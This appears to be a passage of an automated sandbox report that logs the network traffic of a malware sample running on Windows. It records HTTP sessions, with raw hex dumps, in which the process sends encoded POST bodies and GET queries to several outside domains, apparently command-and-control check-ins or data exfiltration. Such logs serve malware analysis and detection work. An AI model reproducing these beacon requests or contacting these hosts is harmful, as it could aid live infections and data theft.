33 51 4d 64 67 49 4a 50 32 50 54 37 70 64 4d 38 38 50 75 6a 49 51 2b 30 74 78 4f 6e 44 63 58 58 4e 66 37 31 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=RYtYHr2RDxg2uTGkQDCtI0jbh6uSTMHsQIVkt0TWYqLAwxB9roap4JAL5tQOOLO1liqJs+7N1PPs9HeXYXbH7+gU/PbE1ms4LySSVFpnXgO/23nmvoBxUD7kqtMySqmljMl8CipGcd/5Jb7qKOHZgu/pXdj0/6vURmKKkW2l/MIBsTqPxTsHBsAL0g9G33BX5shBHHjRNZlk/2TepNipYZqmvJsuSJbqgUAZdmmJXocJA2B6pl+EeYXXVcBOJQIwnRuLcANmxs0s8YwG+gl4CA47h8MSy2+tua0os3QMdgIJP2PT7pdM88PujIQ+0txOnDcXXNf7179sR0KvSZ2burGiYwV8bLWblnRZ/f2VCdMScpojWV/D7sp3JXD8rMrMVOXIGvtaBABtTWTKUFfQT26tzpwAygp9awyGlzqpPupIKQTKebcKs99xlEh+N6WNg+jrUYRVc/Btthmu4/Z79abR3tIxT9AwLtEa2/4i+vwDof7IXutalK7yaiyR0FJ9BkJPeRU19Kmnqr6pVD4UNXw3ZENv2dhfa21J/S13UUQaeAYsuL/cCguENU6LbI9rz49q6Ia+hwHGDi+KusSSFv18NgChI/wWLAtF86UWTwQvV0WrzmGucTEXFa8uzsmKugXfoCeA7KVeL/jG/4o9EInitjc+kKwwqKUYZp2CFUxoCvIis/Z1NkxMJfdY7ahPVdOTH5rCx8OmsHFmMxrirL85sUrujYMA4ElRWn6xCf5D9rFqffoglLnKNXxHLb1gHk0JaaY+1kxHhuNXubRe5f278mNaSkgKAwsUPEti1rrxA+JreWaDhayY8439SWetUSaPnHXttSTn6KSPHl2FlASv1xYU1wawk5faHVN4D8C6IG+euWUHe0qr7cFUQQTjt8qC0qv0wPFlUiJl5VDXig6S/MyzEWffsrrk1nO12DsMYO1SRGMs66wHCvkqdd1xG8m7zGWcJVl9onzPvhGsNbjBqbE/fqMCNh0CevuWCUr [TRUNCATED]
                                                                    Dec 5, 2024 09:45:36.342675924 CET1236INHTTP/1.1 200 OK
                                                                    date: Thu, 05 Dec 2024 08:45:35 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1138
                                                                    x-request-id: 665c7459-ef71-4203-bb9f-1b49f67554a4
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==
                                                                    set-cookie: parking_session=665c7459-ef71-4203-bb9f-1b49f67554a4; expires=Thu, 05 Dec 2024 09:00:36 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 57 39 57 76 41 42 31 71 66 46 44 50 72 65 39 35 6c 4b 55 48 70 62 6c 72 55 71 63 74 4c 32 62 44 69 59 6d 6c 4d 6d 36 73 66 69 6b 59 32 51 56 38 55 4a 76 45 50 69 33 44 33 56 58 79 55 4e 30 4b 68 6b 36 67 31 59 64 33 7a 66 2b 7a 43 4a 36 38 52 44 48 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IW9WvAB1qfFDPre95lKUHpblrUqctL2bDiYmlMm6sfikY2QV8UJvEPi3D3VXyUN0Khk6g1Yd3zf+zCJ68RDHOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 5, 2024 09:45:36.342767000 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjY1Yzc0NTktZWY3MS00MjAzLWJiOWYtMWI0OWY2NzU1NGE0IiwicGFnZV90aW1lIjoxNzMzMzg4Mz


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.849741199.59.243.227805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:37.834777117 CET523OUTGET /9qaj/?t8=erepa0aHg&dpy4vDKP=caF4EcuODBgQ1i6gPG20EU6tn7+OYu3Aff5fuR7QYIa9oDxgmbqLqfUGksVeBOzK8iLLl5bd6dj0pUPLQhqCx4w42vP06UsMAFCvdgslU2ProEjwrqN2bmfrxuo1f5qv1g== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.acond-22-mvr.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:45:38.915838957 CET1236INHTTP/1.1 200 OK
                                                                    date: Thu, 05 Dec 2024 08:45:38 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1506
                                                                    x-request-id: a5e56f20-c01e-49e5-9df2-e526898dbcb1
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KTbAYdnavz/s7jIiqmR6Mit0yOmzec7JiCiBl2Y20ED5QwC1kyrWrUwayPw9RN+ia9XmS19RRbcQ5mzVEnoqzw==
                                                                    set-cookie: parking_session=a5e56f20-c01e-49e5-9df2-e526898dbcb1; expires=Thu, 05 Dec 2024 09:00:38 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 54 62 41 59 64 6e 61 76 7a 2f 73 37 6a 49 69 71 6d 52 36 4d 69 74 30 79 4f 6d 7a 65 63 37 4a 69 43 69 42 6c 32 59 32 30 45 44 35 51 77 43 31 6b 79 72 57 72 55 77 61 79 50 77 39 52 4e 2b 69 61 39 58 6d 53 31 39 52 52 62 63 51 35 6d 7a 56 45 6e 6f 71 7a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_KTbAYdnavz/s7jIiqmR6Mit0yOmzec7JiCiBl2Y20ED5QwC1kyrWrUwayPw9RN+ia9XmS19RRbcQ5mzVEnoqzw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Dec 5, 2024 09:45:38.915883064 CET959INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVlNTZmMjAtYzAxZS00OWU1LTlkZjItZTUyNjg5OGRiY2IxIiwicGFnZV90aW1lIjoxNzMzMzg4Mz


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.84974291.226.30.3805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:44.656790972 CET768OUTPOST /v3s3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.vpnto.net
                                                                    Origin: http://www.vpnto.net
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.vpnto.net/v3s3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 67 77 50 64 55 76 49 75 72 43 34 78 57 76 38 72 54 44 48 71 57 62 46 37 64 64 43 74 4b 51 53 2b 72 58 57 47 79 69 61 38 39 4b 79 63 68 65 38 62 79 73 79 67 4b 6a 6f 4b 67 36 4c 34 71 50 57 4a 71 59 61 56 5a 4c 48 45 58 52 44 6a 6e 61 41 49 6a 64 79 48 6c 61 4b 4b 7a 61 6a 56 47 4f 54 64 65 75 38 4b 52 55 31 74 57 2b 43 4e 47 6e 57 49 46 6a 38 71 56 4c 47 58 54 77 72 55 62 38 64 36 36 45 61 56 4d 6e 38 4b 7a 66 61 68 76 44 7a 30 42 47 49 32 45 54 54 77 53 73 51 58 42 64 36 46 54 69 31 69 50 4f 55 65 69 76 55 30 45 46 67 6f 76 63 49 5a 4a 70 30 55 63 48 47 6f 68 30 77 4b 4a 6e 59 73 56 58 67 3d
                                                                    Data Ascii: dpy4vDKP=gwPdUvIurC4xWv8rTDHqWbF7ddCtKQS+rXWGyia89Kyche8bysygKjoKg6L4qPWJqYaVZLHEXRDjnaAIjdyHlaKKzajVGOTdeu8KRU1tW+CNGnWIFj8qVLGXTwrUb8d66EaVMn8KzfahvDz0BGI2ETTwSsQXBd6FTi1iPOUeivU0EFgovcIZJp0UcHGoh0wKJnYsVXg=
                                                                    Dec 5, 2024 09:45:45.975054979 CET1236INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 63 33 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c5 59 5b 6f db 46 16 7e b6 7f c5 84 01 22 19 6b 91 96 93 26 b1 2c a9 d8 5c 80 64 e1 5c d0 b8 9b 2d 82 20 a0 c8 91 c4 58 22 15 92 b2 ec a6 01 72 d9 34 2d 1c 24 bb 45 81 f6 61 b1 4d 8b 7d 58 60 b1 80 ed c4 b5 6a c7 0e d0 5f 40 fe a3 fd ce cc 90 a2 2c d9 2e f6 61 37 6d 14 8a 33 73 e6 cc b9 7c e7 3b a3 f2 89 4b 37 2e 2e 7e 76 f3 32 6b 86 ed 16 bb f9 e9 85 85 ab 17 99 56 30 8c db a7 2f 1a c6 a5 c5 4b ec 4f 57 16 af 2d b0 a2 3e c3 6e 85 be 63 85 86 71 f9 ba c6 b4 66 18 76 4a 86 d1 eb f5 f4 de 69 dd f3 1b c6 e2 27 c6 0a 49 29 d2 32 f5 58 08 c4 1a dd 0e 6d ad 3a 59 16 9b ac b4 5b 6e 50 19 23 a0 38 37 37 27 d7 69 0c 93 4a 2d d3 6d 54 34 ee 6a 2c 7d 22 19 dc b4 ab 93 93 13 e5 36 0f 4d e6 9a 6d 5e d1 96 f8 6a cf f3 ed 40 63 96 e7 86 dc 0d 2b 5a f4 2e da 8f de 47 5b d1 de 34 8b 1f e3 df b7 51 3f 7e 12 3f c5 f3 7a fc 34 da 8f 1f 4f b3 c1 9c 68 2f 5e 8b b6 58 d4 97 4b a2 f5 31 8b be 84 80 d7 d9 35 fb d1 e6 34 b3 bd b6 e9 b8 d3 cc b1 f1 d1 6b 7a 4e 80 83 2a e5 52 65 42 [TRUNCATED]
                                                                    Data Ascii: c32Y[oF~"k&,\d\- X"r4-$EaM}X`j_@,.a7m3s|;K7..~v2kV0/KOW->ncqfvJi'I)2Xm:Y[nP#877'iJ-mT4j,}"6Mm^j@c+Z.G[4Q?~?z4Oh/^XK154kzN*ReBtx(4CnX/`SrE(/,vq.1*Zx<*+!^VXSF;VOC'lq<plweC\UT>Q(L+5-0fYP-t6eSzBsY5|uU/Sz4yE33JTPcQlkNrlrQ_C`@0-!_W)?geV3IG^->s7xxkSwfN@L|iVbwL{67~x=iF,X*?kaAm,p@]Pjmi~@QL=~?Su}Ss+d7]Hyc}y[p$&T/xmf+XZoguKzSJV|]/yji7>8DRU8dYV7Q[@lLD%@Pcrcz{[j:LL0)G9]Li`5<6R [TRUNCATED]
                                                                    Dec 5, 2024 09:45:45.975104094 CET1236INData Raw: d5 21 55 50 1c 96 13 d8 d1 aa 29 02 49 21 cd a2 94 32 81 b3 29 7b b7 4d bf e1 b8 a5 99 79 d6 41 cc 38 6e a3 34 a3 55 a3 1f a3 f5 e8 97 f8 29 8b 36 59 f4 01 d8 bd 1f 7f 19 6d 01 c7 9f 00 ad 09 ca a3 6d f1 b9 81 81 a7 d1 4e d4 17 fa 91 7a c2 25 93
                                                                    Data Ascii: !UP)I!2){MyA8n4U)6YmmNz%zZ7Km'[At1frU.2[#0C^t[~ q|n"*K,({u4nVSfi3XC5=@zRE{KQBj*K+MU
                                                                    Dec 5, 2024 09:45:45.975141048 CET844INData Raw: 3c 0a 42 a7 52 c2 06 27 27 a9 29 4c ff 64 6c 96 ab e7 c0 00 d3 11 7a 18 22 de 0f 12 d6 2d 19 b8 e2 5a 82 9d 81 35 1d b4 26 7c 36 e8 d4 4e d3 17 dc 2c e0 2e 86 9d fc fd b9 d9 62 71 4e 99 be 27 9a ca 12 ab 79 2d 1b 34 5b 31 e7 41 63 a8 88 77 a2 c9
                                                                    Data Ascii: <BR'')Ldlz"-Z5&|6N,.bqN'y-4[1Acw0NxEEKa]H<9PzL6+ZA]<,#;CyM-*TuYp15Idrh^du.}l2hJ~ ,0*HI'&&$l`sBU42


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.84974391.226.30.3805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:47.323132992 CET788OUTPOST /v3s3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.vpnto.net
                                                                    Origin: http://www.vpnto.net
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.vpnto.net/v3s3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 67 77 50 64 55 76 49 75 72 43 34 78 51 38 6b 72 56 6b 54 71 42 72 46 34 53 39 43 74 44 77 53 36 72 58 61 47 79 6a 66 37 39 35 61 63 68 37 59 62 7a 74 79 67 5a 54 6f 4b 6f 61 4b 54 33 66 57 4f 71 59 57 33 5a 50 48 45 58 51 6a 6a 6e 66 45 49 2f 37 36 45 6b 4b 4b 49 38 36 69 7a 43 4f 54 64 65 75 38 4b 52 55 68 44 57 2f 71 4e 47 58 47 49 45 48 6f 31 57 4c 47 51 57 77 72 55 4a 4d 64 6d 36 45 62 77 4d 6d 52 6c 7a 64 69 68 76 47 50 30 43 55 77 78 52 44 54 32 4d 63 52 79 49 64 2f 76 55 43 51 48 46 50 41 6d 6e 39 51 77 42 7a 52 43 31 2b 41 66 4b 70 63 2f 63 45 75 65 6b 44 74 69 54 45 49 63 4c 41 32 7a 76 43 4b 4b 34 46 69 75 79 47 72 4e 2f 6a 4b 46 6b 73 41 54
                                                                    Data Ascii: dpy4vDKP=gwPdUvIurC4xQ8krVkTqBrF4S9CtDwS6rXaGyjf795ach7YbztygZToKoaKT3fWOqYW3ZPHEXQjjnfEI/76EkKKI86izCOTdeu8KRUhDW/qNGXGIEHo1WLGQWwrUJMdm6EbwMmRlzdihvGP0CUwxRDT2McRyId/vUCQHFPAmn9QwBzRC1+AfKpc/cEuekDtiTEIcLA2zvCKK4FiuyGrN/jKFksAT
                                                                    Dec 5, 2024 09:45:48.700352907 CET1236INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 63 33 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c5 59 5b 6f db 46 16 7e b6 7f c5 84 01 22 19 6b 91 96 93 26 b1 2c a9 d8 5c 80 64 e1 5c d0 b8 9b 2d 82 20 a0 c8 91 c4 58 22 15 92 b2 ec a6 01 72 d9 34 2d 1c 24 bb 45 81 f6 61 b1 4d 8b 7d 58 60 b1 80 ed c4 b5 6a c7 0e d0 5f 40 fe a3 fd ce cc 90 a2 2c d9 2e f6 61 37 6d 14 8a 33 73 e6 cc b9 7c e7 3b a3 f2 89 4b 37 2e 2e 7e 76 f3 32 6b 86 ed 16 bb f9 e9 85 85 ab 17 99 56 30 8c db a7 2f 1a c6 a5 c5 4b ec 4f 57 16 af 2d b0 a2 3e c3 6e 85 be 63 85 86 71 f9 ba c6 b4 66 18 76 4a 86 d1 eb f5 f4 de 69 dd f3 1b c6 e2 27 c6 0a 49 29 d2 32 f5 58 08 c4 1a dd 0e 6d ad 3a 59 16 9b ac b4 5b 6e 50 19 23 a0 38 37 37 27 d7 69 0c 93 4a 2d d3 6d 54 34 ee 6a 2c 7d 22 19 dc b4 ab 93 93 13 e5 36 0f 4d e6 9a 6d 5e d1 96 f8 6a cf f3 ed 40 63 96 e7 86 dc 0d 2b 5a f4 2e da 8f de 47 5b d1 de 34 8b 1f e3 df b7 51 3f 7e 12 3f c5 f3 7a fc 34 da 8f 1f 4f b3 c1 9c 68 2f 5e 8b b6 58 d4 97 4b a2 f5 31 8b be 84 80 d7 d9 35 fb d1 e6 34 b3 bd b6 e9 b8 d3 cc b1 f1 d1 6b 7a 4e 80 83 2a e5 52 65 42 [TRUNCATED]
                                                                    Data Ascii: c32Y[oF~"k&,\d\- X"r4-$EaM}X`j_@,.a7m3s|;K7..~v2kV0/KOW->ncqfvJi'I)2Xm:Y[nP#877'iJ-mT4j,}"6Mm^j@c+Z.G[4Q?~?z4Oh/^XK154kzN*ReBtx(4CnX/`SrE(/,vq.1*Zx<*+!^VXSF;VOC'lq<plweC\UT>Q(L+5-0fYP-t6eSzBsY5|uU/Sz4yE33JTPcQlkNrlrQ_C`@0-!_W)?geV3IG^->s7xxkSwfN@L|iVbwL{67~x=iF,X*?kaAm,p@]Pjmi~@QL=~?Su}Ss+d7]Hyc}y[p$&T/xmf+XZoguKzSJV|]/yji7>8DRU8dYV7Q[@lLD%@Pcrcz{[j:LL0)G9]Li`5<6R [TRUNCATED]
                                                                    Dec 5, 2024 09:45:48.700423956 CET1236INData Raw: d5 21 55 50 1c 96 13 d8 d1 aa 29 02 49 21 cd a2 94 32 81 b3 29 7b b7 4d bf e1 b8 a5 99 79 d6 41 cc 38 6e a3 34 a3 55 a3 1f a3 f5 e8 97 f8 29 8b 36 59 f4 01 d8 bd 1f 7f 19 6d 01 c7 9f 00 ad 09 ca a3 6d f1 b9 81 81 a7 d1 4e d4 17 fa 91 7a c2 25 93
                                                                    Data Ascii: !UP)I!2){MyA8n4U)6YmmNz%zZ7Km'[At1frU.2[#0C^t[~ q|n"*K,({u4nVSfi3XC5=@zRE{KQBj*K+MU
                                                                    Dec 5, 2024 09:45:48.700437069 CET844INData Raw: 3c 0a 42 a7 52 c2 06 27 27 a9 29 4c ff 64 6c 96 ab e7 c0 00 d3 11 7a 18 22 de 0f 12 d6 2d 19 b8 e2 5a 82 9d 81 35 1d b4 26 7c 36 e8 d4 4e d3 17 dc 2c e0 2e 86 9d fc fd b9 d9 62 71 4e 99 be 27 9a ca 12 ab 79 2d 1b 34 5b 31 e7 41 63 a8 88 77 a2 c9
                                                                    Data Ascii: <BR'')Ldlz"-Z5&|6N,.bqN'y-4[1Acw0NxEEKa]H<9PzL6+ZA]<,#;CyM-*TuYp15Idrh^du.}l2hJ~ ,0*HI'&&$l`sBU42


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.84974491.226.30.3805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:49.991933107 CET1805OUTPOST /v3s3/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.vpnto.net
                                                                    Origin: http://www.vpnto.net
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.vpnto.net/v3s3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 67 77 50 64 55 76 49 75 72 43 34 78 51 38 6b 72 56 6b 54 71 42 72 46 34 53 39 43 74 44 77 53 36 72 58 61 47 79 6a 66 37 39 2f 43 63 68 49 67 62 79 4f 61 67 49 6a 6f 4b 69 36 4c 30 33 66 58 53 71 59 4f 7a 5a 50 4b 37 58 56 6e 6a 6d 35 34 49 76 4f 61 45 75 4b 4b 49 35 4b 6a 55 47 4f 54 45 65 75 74 44 52 55 78 44 57 2f 71 4e 47 52 4b 49 55 6a 38 31 51 4c 47 58 54 77 72 51 62 38 64 61 36 48 72 4b 4d 6d 6b 61 30 70 57 68 73 6e 2f 30 44 6e 49 78 51 6a 54 30 4e 63 52 51 49 63 44 30 55 43 64 34 46 50 30 41 6e 2f 51 77 43 6e 6b 64 68 2b 77 2b 51 4b 41 37 63 46 6d 67 38 44 56 30 4e 56 41 4e 47 79 4b 6c 6c 6c 53 5a 32 6b 33 6d 2f 6e 4c 49 68 48 65 75 6f 38 6c 73 7a 76 44 67 2f 46 37 50 78 44 6d 6e 6a 45 63 41 71 50 68 6b 68 56 32 36 31 53 65 30 39 65 45 6f 50 79 41 63 62 38 4a 79 61 44 4e 44 46 56 6f 62 6f 38 4e 2b 2f 75 6b 73 44 78 75 61 74 31 4a 77 2b 30 75 47 48 6a 51 38 72 6a 55 79 2b 54 53 72 41 6e 58 32 76 6e 39 37 33 6e 74 42 35 66 37 36 76 31 4e 31 6f 37 35 4d 70 30 56 64 69 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=gwPdUvIurC4xQ8krVkTqBrF4S9CtDwS6rXaGyjf79/CchIgbyOagIjoKi6L03fXSqYOzZPK7XVnjm54IvOaEuKKI5KjUGOTEeutDRUxDW/qNGRKIUj81QLGXTwrQb8da6HrKMmka0pWhsn/0DnIxQjT0NcRQIcD0UCd4FP0An/QwCnkdh+w+QKA7cFmg8DV0NVANGyKlllSZ2k3m/nLIhHeuo8lszvDg/F7PxDmnjEcAqPhkhV261Se09eEoPyAcb8JyaDNDFVobo8N+/uksDxuat1Jw+0uGHjQ8rjUy+TSrAnX2vn973ntB5f76v1N1o75Mp0VdilL4Epi8DOpcyC4aPQZ//+HuzqB3jg96bBSvmjRXSU4zRXr2jPO5wHHr8/7opipGl+Res5viFj0WAbapCvCegZAq20l34jX7TM+F4z7NqpWmoFW3xU5I+UMndefFsu8S6Rby/LZcgD5v7J5uzt+WUYkjys8WVHby1pQS+5o/xGk6aMeMeCHQCTtwmcBbIXFTh49NmQ57LeWAxagzwVToHZdHco+4+HqdZi8n6CxgUpy9SybMzRSBpg2ZXSdOyle/Ot8ygnLwFgsQl++9M10LBPCtLrYHSLrFgkSIsZ3onAqWwwZcldDwcs619DVHVixII9eUXciZHgdNTG3JGakAtpFX4Jg7sJRrajJgQV/UpS72UJ2g55zNrwl1Vkp/53AR9qPmkzw/Y+BvNBzQuua6OhDTbCp9I9BcnXh5zgxfSzNbV51S9xVU9GISc+LbO408G3ebIkC8y53PCE25qmE3Xt5g0ExV76PTiuWRw+uPS6cbypvtqEu+fBfMB6umf2Vzn2Pzy7LxV7prUD8pi/ifrgApg1ki2B+67OV6ujPMUBFZ6q5ymedsuzz1LOR+s2R+VRF5dazEnAX5aHS19Jp+AM8HYBPqj0yQ9hBb9yTbRMveDfQtJd1fHa89hQTBASGWBIzyjzpAgPMGVKMFLXiH9dZxVaHBuEccbPP [TRUNCATED]
                                                                    Dec 5, 2024 09:45:51.317899942 CET1236INHTTP/1.1 200 OK
